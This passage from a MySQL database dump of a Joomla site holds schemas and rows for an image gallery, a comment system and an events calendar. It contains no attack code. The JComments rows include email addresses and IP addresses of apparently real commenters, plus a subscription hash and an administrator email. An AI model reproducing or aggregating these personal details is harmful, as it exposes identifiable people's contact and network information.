/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_imageshow_showcase` (
  `showcase_id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `showcase_title` varchar(150) DEFAULT NULL,
  `published` tinyint(1) DEFAULT '0',
  `ordering` int(11) DEFAULT '0',
  `background_color` char(30) DEFAULT NULL,
  `general_overall_width` char(30) DEFAULT NULL,
  `general_overall_height` char(30) DEFAULT NULL,
  `general_round_corner_radius` char(30) DEFAULT NULL,
  `general_border_stroke` char(30) DEFAULT NULL,
  `general_border_color` char(30) DEFAULT NULL,
  `general_number_images_preload` char(30) DEFAULT NULL,
  `general_open_link_in` char(30) DEFAULT NULL,
  `general_link_source` char(30) DEFAULT NULL,
  `general_title_source` char(30) DEFAULT NULL,
  `general_des_source` char(30) DEFAULT NULL,
  `general_images_order` char(30) DEFAULT NULL,
  `imgpanel_presentation_mode` char(30) DEFAULT '0',
  `imgpanel_img_transition_type_fit` char(30) DEFAULT '',
  `imgpanel_img_transition_timing_fit` char(50) DEFAULT NULL,
  `imgpanel_img_click_action_fit` char(30) DEFAULT '',
  `imgpanel_img_transition_type_expand` char(30) DEFAULT '',
  `imgpanel_img_transition_timing_expand` char(255) DEFAULT '50',
  `imgpanel_img_motion_type_expand` char(30) DEFAULT '',
  `imgpanel_img_motion_timing_expand` char(50) DEFAULT NULL,
  `imgpanel_img_click_action_expand` char(30) DEFAULT '',
  `imgpanel_bg_type` char(30) DEFAULT '',
  `imgpanel_bg_value` char(255) DEFAULT NULL,
  `imgpanel_show_watermark` tinyint(1) DEFAULT '0',
  `imgpanel_watermark_path` char(255) DEFAULT NULL,
  `imgpanel_watermark_position` char(30) DEFAULT '',
  `imgpanel_watermark_offset` char(30) DEFAULT NULL,
  `imgpanel_watermark_opacity` char(30) DEFAULT NULL,
  `imgpanel_show_overlay_effect` tinyint(1) DEFAULT '1',
  `imgpanel_overlay_effect_type` char(30) DEFAULT NULL,
  `imgpanel_show_inner_shawdow` tinyint(1) DEFAULT '0',
  `thumbpanel_show_panel` tinyint(1) DEFAULT '0',
  `thumbpanel_panel_position` char(30) DEFAULT '',
  `thumbpanel_collapsible_position` tinyint(1) DEFAULT '0',
  `thumbpanel_thumb_browsing_mode` char(30) DEFAULT '',
  `thumbpanel_show_thumb_status` tinyint(1) DEFAULT '0',
  `thumbpanel_active_state_color` char(30) DEFAULT NULL,
  `thumbpanel_presentation_mode` char(30) DEFAULT '',
  `thumbpanel_border` char(30) DEFAULT NULL,
  `thumbpanel_enable_big_thumb` tinyint(1) DEFAULT '0',
  `thumbpanel_big_thumb_size` char(30) DEFAULT NULL,
  `thumbpanel_thumb_row` char(30) DEFAULT NULL,
  `thumbpanel_thumb_width` char(30) DEFAULT NULL,
  `thumbpanel_thumb_height` char(30) DEFAULT NULL,
  `thumbpanel_big_thumb_color` char(30) DEFAULT NULL,
  `thumbpanel_thumb_border` char(30) DEFAULT NULL,
  `thumbpanel_thumnail_panel_color` char(30) DEFAULT NULL,
  `thumbpanel_thumnail_normal_state` char(30) DEFAULT NULL,
  `infopanel_panel_position` char(30) DEFAULT '',
  `infopanel_presentation` char(30) DEFAULT NULL,
  `infopanel_bg_color_fill` char(30) DEFAULT NULL,
  `infopanel_panel_click_action` char(30) DEFAULT NULL,
  `infopanel_show_title` tinyint(1) DEFAULT '0',
  `infopanel_title_css` char(250) DEFAULT NULL,
  `infopanel_show_des` tinyint(1) DEFAULT '0',
  `infopanel_des_lenght_limitation` char(30) DEFAULT '',
  `infopanel_des_css` char(250) DEFAULT NULL,
  `infopanel_show_link` tinyint(1) DEFAULT '0',
  `infopanel_link_css` char(250) DEFAULT NULL,
  `toolbarpanel_panel_position` char(30) DEFAULT '',
  `toolbarpanel_presentation` char(30) DEFAULT '0',
  `toolbarpanel_show_image_navigation` tinyint(1) DEFAULT '0',
  `toolbarpanel_slideshow_player` tinyint(1) DEFAULT '0',
  `toolbarpanel_show_fullscreen_switcher` tinyint(1) DEFAULT '0',
  `toolbarpanel_show_tooltip` tinyint(1) DEFAULT '0',
  `slideshow_show_thumb_panel` tinyint(1) DEFAULT '0',
  `slideshow_show_overlay_effect` tinyint(1) DEFAULT '0',
  `slideshow_slide_timing` char(50) DEFAULT NULL,
  `slideshow_show_image_navigation` tinyint(1) DEFAULT '0',
  `slideshow_process` tinyint(1) DEFAULT '0',
  `slideshow_show_watermark` tinyint(1) DEFAULT '0',
  `slideshow_show_timer` tinyint(1) DEFAULT '1',
  `slideshow_enable_ken_burn_effect` tinyint(1) DEFAULT '1',
  `slideshow_presentation_mode` char(30) DEFAULT NULL,
  `slideshow_looping` tinyint(1) DEFAULT '1',
  `date_created` datetime DEFAULT '0000-00-00 00:00:00',
  `date_modified` datetime DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`showcase_id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_imageshow_showcase`
--

LOCK TABLES `jos_imageshow_showcase` WRITE;
/*!40000 ALTER TABLE `jos_imageshow_showcase` DISABLE KEYS */;
INSERT INTO `jos_imageshow_showcase` VALUES (1,'showcase-example',0,2,'#ffffff','100%','280','1','2','#000000','3','new-browser','showlist','image','showlist','forward','expand-out','random','2','image-zooming','random','2','center-random','3','open-image-link','1','#333333',0,'','top-right','10','75',0,'horizontal-floating-bar',1,0,'bottom',1,'pagination',1,'#ff6200','image','1',1,'150','1','50','40','#ffffff','2','#000000','#000000','top','auto','#000000','no-action',1,'font-family: Verdana; font-size: 12px; font-weight: bold; text-align: left; color: #E9E9E9;',0,'50','font-family: Arial; font-size: 11px; font-weight: normal; text-align: left; color: #AFAFAF;',0,'font-family: Verdana; font-size: 11px; font-weight: bold; text-align: right; color: #E06614;','bottom','auto',0,1,0,0,0,1,'10',0,1,0,0,1,'expand-out',1,'2010-01-15 10:50:46','2010-04-23 03:43:38'),(2,'RTG',1,1,'#ffffff','75%','50','1','2','#000000','3','new-browser','image','image','image','forward','fit-in','random','2','image-zooming','random','1','center-random','2','open-image-link','2','#595959,#262626',0,'','top-right','10','75',0,'horizontal-floating-bar',1,1,'bottom',1,'pagination',1,'#ff6200','image','1',1,'150','1','50','40','#ffffff','2','#000000','#ffffff','top','auto','#000000','no-action',1,'font-family: Verdana;\r\nfont-size: 12px;\r\nfont-weight: bold;\r\ntext-align: left;\r\ncolor: #E9E9E9;',1,'50','font-family: Arial;\r\nfont-size: 11px;\r\nfont-weight: normal;\r\ntext-align: left;\r\ncolor: #AFAFAF;',0,'font-family: Verdana;\r\nfont-size: 11px;\r\nfont-weight: bold;\r\ntext-align: right;\r\ncolor: #E06614;','bottom','auto',1,1,1,0,0,1,'8',0,0,0,1,1,'expand-out',1,'2010-06-09 15:04:16','2010-06-09 15:09:37');
/*!40000 ALTER TABLE `jos_imageshow_showcase` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_imageshow_showlist`
--

DROP TABLE IF EXISTS `jos_imageshow_showlist`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_imageshow_showlist` (
  `showlist_id` int(11) NOT NULL AUTO_INCREMENT,
  `showlist_title` varchar(40) DEFAULT NULL,
  `published` tinyint(1) DEFAULT '0',
  `ordering` int(11) DEFAULT NULL,
  `access` tinyint(3) DEFAULT NULL,
  `hits` int(11) DEFAULT NULL,
  `description` text,
  `showlist_link` text,
  `alter_autid` int(11) DEFAULT '0',
  `alter_id` int(11) DEFAULT NULL,
  `date_create` datetime DEFAULT NULL,
  `showlist_source` tinyint(2) DEFAULT '0',
  `configuration_id` int(11) DEFAULT '0',
  `authorization_status` tinyint(1) DEFAULT '0',
  `alternative_status` tinyint(2) DEFAULT '0',
  `date_modified` datetime DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`showlist_id`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_imageshow_showlist`
--

LOCK TABLES `jos_imageshow_showlist` WRITE;
/*!40000 ALTER TABLE `jos_imageshow_showlist` DISABLE KEYS */;
INSERT INTO `jos_imageshow_showlist` VALUES (3,'Sample Promo Images',0,2,0,92651,'','http://www.joomlashine.com/joomla-extensions/jsn-imageshow.html',0,0,'2010-04-23 03:42:44',3,3,0,0,'2010-04-23 03:42:44'),(4,'RTG',1,1,0,1,'','',0,0,'2010-06-09 14:56:57',1,4,0,0,'0000-00-00 00:00:00');
/*!40000 ALTER TABLE `jos_imageshow_showlist` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_jcomments`
--

DROP TABLE IF EXISTS `jos_jcomments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_jcomments` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `parent` int(11) unsigned NOT NULL DEFAULT '0',
  `object_id` int(11) unsigned NOT NULL DEFAULT '0',
  `object_group` varchar(255) NOT NULL DEFAULT '',
  `object_params` text NOT NULL,
  `lang` varchar(255) NOT NULL DEFAULT '',
  `userid` int(11) unsigned NOT NULL DEFAULT '0',
  `name` varchar(255) NOT NULL DEFAULT '',
  `username` varchar(255) NOT NULL DEFAULT '',
  `email` varchar(255) NOT NULL DEFAULT '',
  `homepage` varchar(255) NOT NULL DEFAULT '',
  `title` varchar(255) NOT NULL DEFAULT '',
  `comment` text NOT NULL,
  `ip` varchar(15) NOT NULL DEFAULT '',
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `isgood` smallint(5) unsigned NOT NULL DEFAULT '0',
  `ispoor` smallint(5) unsigned NOT NULL DEFAULT '0',
  `published` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `subscribe` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `source` varchar(255) NOT NULL DEFAULT '',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `editor` varchar(50) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `idx_userid` (`userid`),
  KEY `idx_source` (`source`),
  KEY `idx_email` (`email`),
  KEY `idx_lang` (`lang`),
  KEY `idx_subscribe` (`subscribe`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_object` (`object_id`,`object_group`,`published`,`date`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_jcomments`
--

LOCK TABLES `jos_jcomments` WRITE;
/*!40000 ALTER TABLE `jos_jcomments` DISABLE KEYS */;
INSERT INTO `jos_jcomments` VALUES (1,0,44,'com_content','','en-GB',0,'Joe Commentable','Joe Commentable','jhbrake@comcast.net','','','A title for the new book: Elitists and the Age of Enlightment Revisited.','67.142.161.27','2010-06-11 21:32:48',0,0,1,0,'',62,'2010-06-16 02:39:53',''),(2,0,3,'com_content','','en-GB',0,'greg','greg','gwhitaker@comcast.net','','','I agree 100% Throw the bums out!','70.155.87.66','2010-06-16 02:55:29',0,0,1,0,'',0,'0000-00-00 00:00:00','');
/*!40000 ALTER TABLE `jos_jcomments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_jcomments_custom_bbcodes`
--

DROP TABLE IF EXISTS `jos_jcomments_custom_bbcodes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_jcomments_custom_bbcodes` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(32) NOT NULL DEFAULT '',
  `simple_pattern` varchar(255) NOT NULL DEFAULT '',
  `simple_replacement_html` text NOT NULL,
  `simple_replacement_text` text NOT NULL,
  `pattern` varchar(255) NOT NULL DEFAULT '',
  `replacement_html` text NOT NULL,
  `replacement_text` text NOT NULL,
  `button_acl` text NOT NULL,
  `button_open_tag` varchar(16) NOT NULL DEFAULT '',
  `button_close_tag` varchar(16) NOT NULL DEFAULT '',
  `button_title` varchar(255) NOT NULL DEFAULT '',
  `button_prompt` varchar(255) NOT NULL DEFAULT '',
  `button_image` varchar(255) NOT NULL DEFAULT '',
  `button_css` varchar(255) NOT NULL DEFAULT '',
  `button_enabled` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `ordering` int(11) unsigned NOT NULL DEFAULT '0',
  `published` tinyint(1) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_jcomments_custom_bbcodes`
--

LOCK TABLES `jos_jcomments_custom_bbcodes` WRITE;
/*!40000 ALTER TABLE `jos_jcomments_custom_bbcodes` DISABLE KEYS */;
INSERT INTO `jos_jcomments_custom_bbcodes` VALUES (1,'YouTube Video','[youtube]http://www.youtube.com/watch?v={IDENTIFIER}[/youtube]','<object width=\"425\" height=\"350\"><param name=\"movie\" value=\"http://www.youtube.com/v/{IDENTIFIER}\"></param><param name=\"wmode\" value=\"transparent\"></param><embed src=\"http://www.youtube.com/v/{IDENTIFIER}\" type=\"application/x-shockwave-flash\" wmode=\"transparent\" width=\"425\" height=\"350\"></embed></object>','http://www.youtube.com/watch?v={IDENTIFIER}','\\[youtube\\]http\\://www\\.youtube\\.com/watch\\?v\\=([A-Za-z0-9-_]+)\\[\\/youtube\\]','<object width=\"425\" height=\"350\"><param name=\"movie\" value=\"http://www.youtube.com/v/${1}\"></param><param name=\"wmode\" value=\"transparent\"></param><embed src=\"http://www.youtube.com/v/${1}\" type=\"application/x-shockwave-flash\" wmode=\"transparent\" width=\"425\" height=\"350\"></embed></object>','http://www.youtube.com/watch?v=${1}','Unregistered,Registered,Author,Editor,Publisher,Manager,Administrator,Super Administrator','[youtube]','[/youtube]','YouTube Video','','','bbcode-youtube',1,1,1),(2,'Google Video','[google]http://video.google.com/videoplay?docid={IDENTIFIER}[/google]','<embed style=\"width:425px; height:350px;\" id=\"VideoPlayback\" type=\"application/x-shockwave-flash\" src=\"http://video.google.com/googleplayer.swf?docId={IDENTIFIER}\" flashvars=\"\"></embed>','http://video.google.com/videoplay?docid={IDENTIFIER}','\\[google\\]http\\://video\\.google\\.com/videoplay\\?docid\\=([A-Za-z0-9-_]+)\\[\\/google\\]','<embed style=\"width:425px; height:350px;\" id=\"VideoPlayback\" type=\"application/x-shockwave-flash\" src=\"http://video.google.com/googleplayer.swf?docId=${1}\" flashvars=\"\"></embed>','http://video.google.com/videoplay?docid=${1}','Unregistered,Registered,Author,Editor,Publisher,Manager,Administrator,Super Administrator','[google]','[/google]','Google Video','','','bbcode-google',1,2,1),(3,'Wiki','[wiki]{TEXT}[/wiki]','<a href=\"http://www.wikipedia.org/wiki/{TEXT}\" title=\"{TEXT}\" target=\"_blank\">{TEXT}</a>','{TEXT}','\\[wiki\\]([\\w0-9-\\+\\.,_ ]+)\\[\\/wiki\\]','<a href=\"http://www.wikipedia.org/wiki/${1}\" title=\"${1}\" target=\"_blank\">${1}</a>','${1}','Unregistered,Registered,Author,Editor,Publisher,Manager,Administrator,Super Administrator','[wiki]','[/wiki]','Wikipedia','','','bbcode-wiki',1,3,1);
/*!40000 ALTER TABLE `jos_jcomments_custom_bbcodes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_jcomments_settings`
--

DROP TABLE IF EXISTS `jos_jcomments_settings`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_jcomments_settings` (
  `component` varchar(50) CHARACTER SET utf8 NOT NULL DEFAULT '',
  `lang` varchar(20) CHARACTER SET utf8 NOT NULL DEFAULT '',
  `name` varchar(50) CHARACTER SET utf8 NOT NULL DEFAULT '',
  `value` text NOT NULL,
  PRIMARY KEY (`component`,`lang`,`name`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_jcomments_settings`
--

LOCK TABLES `jos_jcomments_settings` WRITE;
/*!40000 ALTER TABLE `jos_jcomments_settings` DISABLE KEYS */;
INSERT INTO `jos_jcomments_settings` VALUES ('','','enable_username_check','1'),('','','username_maxlength','20'),('','','forbidden_names','administrator,moderator'),('','','author_email','2'),('','','author_homepage','1'),('','','comment_maxlength','1000'),('','','word_maxlength','15'),('','','link_maxlength','30'),('','','flood_time','30'),('','','enable_notification','1'),('','','notification_email','wes@retakeourgov.com'),('','','template','default'),('','','enable_smiles','1'),('','','comments_per_page','10'),('','','comments_page_limit','15'),('','','comments_pagination','both'),('','','comments_order','DESC'),('','','show_commentlength','1'),('','','enable_nested_quotes','1'),('','','enable_rss','1'),('','','censor_replace_word','[censored]'),('','','can_comment','Unregistered,Registered,Author,Editor,Publisher,Manager,Administrator,Super Administrator'),('','','can_reply','Unregistered,Registered,Author,Editor,Publisher,Manager,Administrator,Super Administrator'),('','','show_policy','Unregistered,Registered'),('','','enable_captcha','Unregistered'),('','','floodprotection','Unregistered,Registered,Author,Editor'),('','','enable_comment_length_check','Unregistered,Registered'),('','','autopublish','Registered,Author,Editor,Publisher,Manager,Administrator,Super Administrator'),('','','autolinkurls','Registered,Author,Editor,Publisher,Manager,Administrator,Super Administrator'),('','','enable_subscribe','Unregistered,Registered,Author,Editor,Publisher,Manager,Administrator,Super Administrator'),('','','enable_gravatar',''),('','','can_view_homepage','Registered,Author,Editor,Publisher,Manager,Administrator,Super Administrator'),('','','can_publish','Publisher,Manager,Administrator,Super Administrator'),('','','can_view_email','Manager,Administrator,Super Administrator'),('','','can_edit','Manager,Administrator,Super Administrator'),('','','can_edit_own','Registered,Author,Editor,Publisher,Manager,Administrator,Super Administrator'),('','','can_delete','Manager,Administrator,Super Administrator'),('','','can_delete_own','Manager,Administrator,Super Administrator'),('','','enable_bbcode_b','Registered,Author,Editor,Publisher,Manager,Administrator,Super Administrator'),('','','enable_bbcode_i','Registered,Author,Editor,Publisher,Manager,Administrator,Super Administrator'),('','','enable_bbcode_u','Registered,Author,Editor,Publisher,Manager,Administrator,Super Administrator'),('','','enable_bbcode_s','Registered,Author,Editor,Publisher,Manager,Administrator,Super Administrator'),('','','enable_bbcode_url','Registered,Author,Editor,Publisher,Manager,Administrator,Super Administrator'),('','','enable_bbcode_img','Registered,Author,Editor,Publisher,Manager,Administrator,Super Administrator'),('','','enable_bbcode_list','Registered,Author,Editor,Publisher,Manager,Administrator,Super Administrator'),('','','enable_bbcode_hide','Registered,Author,Editor,Publisher,Manager,Administrator,Super Administrator'),('','','can_view_ip','Administrator,Super Administrator'),('','','enable_categories','13,14,3,1'),('','','emailprotection','Unregistered'),('','','enable_comment_maxlength_check',''),('','','enable_autocensor','Unregistered'),('','','badwords',''),('','','smiles',':D	laugh.gif\n:lol:	lol.gif\n:-)	smile.gif\n;-)	wink.gif\n8)	cool.gif\n:-|	normal.gif\n:-*	whistling.gif\n:oops:	redface.gif\n:sad:	sad.gif\n:cry:	cry.gif\n:o	surprised.gif\n:-?	confused.gif\n:-x	sick.gif\n:eek:	shocked.gif\n:zzz	sleeping.gif\n:P	tongue.gif\n:roll:	rolleyes.gif\n:sigh:	unsure.gif'),('','','enable_mambots','1'),('','','form_show','1'),('','','display_author','name'),('','','enable_voting','1'),('','','can_vote','Unregistered,Registered,Author,Editor,Publisher,Manager,Administrator,Super Administrator'),('','','merge_time','30'),('','','gzip_js','0'),('','','template_view','list'),('','','message_policy_post',''),('','','message_policy_whocancomment',''),('','','message_locked','This content has been locked. You can no longer post any comment.'),('','','comment_title','0'),('','','enable_custom_bbcode','0'),('','','enable_bbcode_quote','Unregistered,Registered,Author,Editor,Publisher,Manager,Administrator,Super Administrator'),('','','enable_bbcode_code',''),('','','enable_geshi','0');
/*!40000 ALTER TABLE `jos_jcomments_settings` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_jcomments_subscriptions`
--

DROP TABLE IF EXISTS `jos_jcomments_subscriptions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_jcomments_subscriptions` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `object_id` int(11) unsigned NOT NULL DEFAULT '0',
  `object_group` varchar(255) NOT NULL DEFAULT '',
  `lang` varchar(255) NOT NULL DEFAULT '',
  `userid` int(11) unsigned NOT NULL DEFAULT '0',
  `name` varchar(255) NOT NULL DEFAULT '',
  `email` varchar(255) NOT NULL DEFAULT '',
  `hash` varchar(255) NOT NULL DEFAULT '',
  `published` tinyint(1) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `idx_object` (`object_id`,`object_group`),
  KEY `idx_lang` (`lang`),
  KEY `idx_hash` (`hash`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_jcomments_subscriptions`
--

LOCK TABLES `jos_jcomments_subscriptions` WRITE;
/*!40000 ALTER TABLE `jos_jcomments_subscriptions` DISABLE KEYS */;
INSERT INTO `jos_jcomments_subscriptions` VALUES (1,44,'com_content','en-GB',0,'Joe Commentable','jhbrake@comcast.net','791f6ae1cf162074c831998909851b23',1);
/*!40000 ALTER TABLE `jos_jcomments_subscriptions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_jcomments_version`
--

DROP TABLE IF EXISTS `jos_jcomments_version`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_jcomments_version` (
  `version` varchar(16) NOT NULL DEFAULT '',
  `previous` varchar(16) NOT NULL DEFAULT '',
  `installed` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`version`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_jcomments_version`
--

LOCK TABLES `jos_jcomments_version` WRITE;
/*!40000 ALTER TABLE `jos_jcomments_version` DISABLE KEYS */;
INSERT INTO `jos_jcomments_version` VALUES ('2.1.0.0','','2010-06-10 21:45:14','0000-00-00 00:00:00');
/*!40000 ALTER TABLE `jos_jcomments_version` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_jcomments_votes`
--

DROP TABLE IF EXISTS `jos_jcomments_votes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_jcomments_votes` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `commentid` int(11) unsigned NOT NULL DEFAULT '0',
  `userid` int(11) unsigned NOT NULL DEFAULT '0',
  `ip` varchar(15) NOT NULL DEFAULT '',
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `value` tinyint(1) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_comment` (`commentid`,`userid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_jcomments_votes`
--

LOCK TABLES `jos_jcomments_votes` WRITE;
/*!40000 ALTER TABLE `jos_jcomments_votes` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_jcomments_votes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_jev_defaults`
--

DROP TABLE IF EXISTS `jos_jev_defaults`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_jev_defaults` (
  `title` varchar(100) NOT NULL DEFAULT '',
  `name` varchar(50) NOT NULL DEFAULT '',
  `subject` text NOT NULL,
  `value` text NOT NULL,
  `state` tinyint(3) NOT NULL DEFAULT '1',
  PRIMARY KEY (`name`),
  KEY `name` (`name`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_jev_defaults`
--

LOCK TABLES `jos_jev_defaults` WRITE;
/*!40000 ALTER TABLE `jos_jev_defaults` DISABLE KEYS */;
INSERT INTO `jos_jev_defaults` VALUES ('Event Detail Page','icalevent.detail_body','','',1);
/*!40000 ALTER TABLE `jos_jev_defaults` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_jev_users`
--

DROP TABLE IF EXISTS `jos_jev_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_jev_users` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` int(11) NOT NULL DEFAULT '0',
  `published` tinyint(2) NOT NULL DEFAULT '0',
  `canuploadimages` tinyint(2) NOT NULL DEFAULT '0',
  `canuploadmovies` tinyint(2) NOT NULL DEFAULT '0',
  `cancreate` tinyint(2) NOT NULL DEFAULT '0',
  `canedit` tinyint(2) NOT NULL DEFAULT '0',
  `canpublishown` tinyint(2) NOT NULL DEFAULT '0',
  `candeleteown` tinyint(2) NOT NULL DEFAULT '0',
  `canpublishall` tinyint(2) NOT NULL DEFAULT '0',
  `candeleteall` tinyint(2) NOT NULL DEFAULT '0',
  `cancreateown` tinyint(2) NOT NULL DEFAULT '0',
  `cancreateglobal` tinyint(2) NOT NULL DEFAULT '0',
  `eventslimit` int(11) NOT NULL DEFAULT '0',
  `extraslimit` int(11) NOT NULL DEFAULT '0',
  `categories` varchar(255) NOT NULL DEFAULT '',
  `calendars` varchar(255) NOT NULL DEFAULT '',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`),
  KEY `user` (`user_id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_jev_users`
--

LOCK TABLES `jos_jev_users` WRITE;
/*!40000 ALTER TABLE `jos_jev_users` DISABLE KEYS */;
INSERT INTO `jos_jev_users` VALUES (1,63,1,1,1,1,1,1,1,1,1,1,1,10000,10000,'','','0000-00-00 00:00:00'),(2,62,1,1,1,1,1,1,1,1,1,1,1,10000,10000,'','','0000-00-00 00:00:00');
/*!40000 ALTER TABLE `jos_jev_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_jevents_categories`
--

DROP TABLE IF EXISTS `jos_jevents_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_jevents_categories` (
  `id` int(12) NOT NULL DEFAULT '0',
  `color` varchar(8) NOT NULL DEFAULT '',
  `admin` int(12) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_jevents_categories`
--

LOCK TABLES `jos_jevents_categories` WRITE;
/*!40000 ALTER TABLE `jos_jevents_categories` DISABLE KEYS */;
INSERT INTO `jos_jevents_categories` VALUES (20,'#CCCCFF',63);
/*!40000 ALTER TABLE `jos_jevents_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_jevents_exception`
--

DROP TABLE IF EXISTS `jos_jevents_exception`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_jevents_exception` (
  `ex_id` int(12) NOT NULL AUTO_INCREMENT,
  `rp_id` int(12) NOT NULL DEFAULT '0',
  `eventid` int(12) NOT NULL DEFAULT '1',
  `eventdetail_id` int(12) NOT NULL DEFAULT '0',
  `exception_type` int(2) NOT NULL DEFAULT '0',
  `startrepeat` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`ex_id`),
  KEY `eventid` (`eventid`),
  KEY `rp_id` (`rp_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_jevents_exception`
--

LOCK TABLES `jos_jevents_exception` WRITE;
/*!40000 ALTER TABLE `jos_jevents_exception` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_jevents_exception` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_jevents_icsfile`
--

DROP TABLE IF EXISTS `jos_jevents_icsfile`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_jevents_icsfile` (
  `ics_id` int(12) NOT NULL AUTO_INCREMENT,
  `srcURL` varchar(255) NOT NULL DEFAULT '',
  `label` varchar(30) NOT NULL DEFAULT '',
  `filename` varchar(120) NOT NULL DEFAULT '',
  `icaltype` tinyint(3) NOT NULL DEFAULT '0',
  `isdefault` tinyint(3) NOT NULL DEFAULT '0',
  `ignoreembedcat` tinyint(3) NOT NULL DEFAULT '0',
  `state` tinyint(3) NOT NULL DEFAULT '1',
  `access` int(11) unsigned NOT NULL DEFAULT '0',
  `catid` int(11) NOT NULL DEFAULT '1',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(11) unsigned NOT NULL DEFAULT '0',
  `created_by_alias` varchar(100) NOT NULL DEFAULT '',
  `modified_by` int(11) unsigned NOT NULL DEFAULT '0',
  `refreshed` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
